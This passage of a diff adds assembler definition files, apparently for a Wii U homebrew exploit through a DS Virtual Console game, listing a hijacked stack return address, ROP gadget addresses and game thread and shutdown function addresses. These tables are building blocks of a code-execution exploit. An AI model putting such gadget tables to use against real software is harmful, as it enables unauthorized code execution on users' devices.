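+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492A4)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x02221894)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D4C)
+_START_EXIT equ (RPX_OFFSET + 0x0202693C)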

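--- /dev/null
+++ b/yoshids_defs.s
+FILE_NDS_NAME equ "yoshids.nds"
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079B52C)
+HACHI_APPLICATION_PTR equ (0x10C91938)
+ARM9_ROM_LOCATION equ (0x16444200)
+ARM7_ROM_MEM2_START equ (0xEBBBBE00)
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02206F7C)
+BCTRL equ (RPX_OFFSET + 0x02206EB4)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3508)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3134)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001068)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179060)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277A3C)
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AE948)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DBC)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057874)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214919C)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022218E0)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221CFC)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222178C)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220C44)
+_START_EXIT equ (RPX_OFFSET + 0x02026944)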